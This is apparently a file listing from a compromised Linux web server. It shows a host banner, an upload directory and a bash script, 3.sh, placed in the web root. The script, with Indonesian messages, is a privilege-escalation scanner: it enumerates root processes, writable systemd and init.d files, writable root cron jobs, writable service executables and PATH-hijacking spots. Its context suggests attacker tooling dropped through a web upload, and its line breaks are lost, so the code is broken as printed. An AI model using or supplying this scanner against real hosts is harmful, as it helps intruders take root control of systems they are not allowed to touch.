Linux puskom-ProLiant-DL385-Gen10 5.4.0-150-generic #167~18.04.1-Ubuntu SMP Wed May 24 00:51:42 UTC 2023 x86_64

/var/www/html/bkd/berkas/

/var/www/html/bkd/berkas/3.sh

#!/bin/bash echo "[*] Advanced Service Privilege Escalation Scanner" echo ### 1. List service root echo "[+] Mencari service yang jalan sebagai root..." ps -U root -u root u | awk '{print $11}' | sort | uniq > /tmp/root_services.txt cat /tmp/root_services.txt echo ### 2. Cari file service yang writable echo "[+] Mengecek file systemd/init.d yang writable..." find /etc/systemd/system /lib/systemd/system /etc/init.d -type f -user root -perm -2 2>/dev/null echo ### 3. Cron job root echo "[+] Mengecek cron job root yang writable..." for cron in /etc/crontab /etc/cron.*/* /var/spool/cron/crontabs/root; do if [ -f "$cron" ]; then ls -l "$cron" if [ -w "$cron" ]; then echo "[!] Writable root cron: $cron" fi fi done echo ### 4. Script path di service root echo "[+] Mengecek script/executable yang dipanggil service root..." for svc in $(systemctl list-unit-files --state=enabled --no-pager --no-legend 2>/dev/null | awk '{print $1}' | grep ".service"); do path=$(systemctl cat "$svc" 2>/dev/null | grep ExecStart | awk '{print $2}' | head -n 1) if [ -n "$path" ] && [ -f "$path" ]; then if [ -w "$path" ]; then echo "[!] Service $svc memanggil file writable: $path" fi fi done echo ### 5. PATH hijacking check echo "[+] Mengecek PATH hijacking di environment service..." for svc in $(systemctl list-unit-files --state=enabled --no-pager --no-legend 2>/dev/null | awk '{print $1}' | grep ".service"); do systemctl show "$svc" 2>/dev/null | grep Environment= | grep PATH= | while read env; do IFS='=' read _ pathval <<< "$env" for p in $(echo $pathval | tr ':' ' '); do if [ -w "$p" ]; then echo "[!] PATH hijacking possible di $svc lewat $p" fi done done done echo echo "[*] Scan complete."